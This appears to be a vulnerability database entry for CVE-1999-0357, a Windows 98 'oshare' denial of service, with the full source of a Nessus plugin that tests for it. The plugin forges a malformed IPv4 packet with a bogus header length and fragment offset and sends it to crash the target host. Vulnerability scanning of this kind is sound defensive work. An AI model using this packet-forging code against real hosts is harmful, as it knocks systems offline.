Vulnerabilities > CVE-1999-0357 - Unspecified vulnerability in Microsoft Windows 98

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
microsoft
nessus

Summary

Windows 98 and other operating systems allows remote attackers to cause a denial of service via crafted "oshare" packets, possibly involving invalid fragmentation offsets.

Vulnerable Configurations

Part Description Count
OS
Microsoft
1

Nessus

NASL familyWindows
NASL idOSHARE.NASL
descriptionIt was possible to crash the remote system using the
last seen2020-06-01
modified2020-06-02
plugin id10170
published1999-07-29
reporterThis script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10170
titleMicrosoft Windows 98 Malformed oshare Packet DoS
code
#
# (C) Tenable Network Security, Inc.
#

# This attack is very unlikely to work from a large number
# of systems which check ip->ip_len before sending the packets.
#

include("compat.inc");

if (description)
{
 script_id(10170);
 script_version("1.26");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0357");

 script_name(english:"Microsoft Windows 98 Malformed oshare Packet DoS");
 script_summary(english:"Crashes the remote host using the 'oshare' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote system using the 'oshare' attack.

An attacker may use this problem to prevent your site from working
properly.");
 script_set_attribute(attribute:"solution", value:"Contact your vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/01/25");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/07/29");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
ip = forge_ip_packet(ip_v : 4, ip_len : 44, ip_hl : 11,
		     ip_tos : 0, ip_id : rand(), ip_off : 16383,
		     ip_ttl : 0xFF, ip_p : IPPROTO_UDP,
		     ip_src : compat::this_host());

start_denial();
send_packet(ip, pcap_active:FALSE);

alive = end_denial();
if(!alive){
		security_hole(0);
		set_kb_item(name:"Host/dead", value:TRUE);
	  }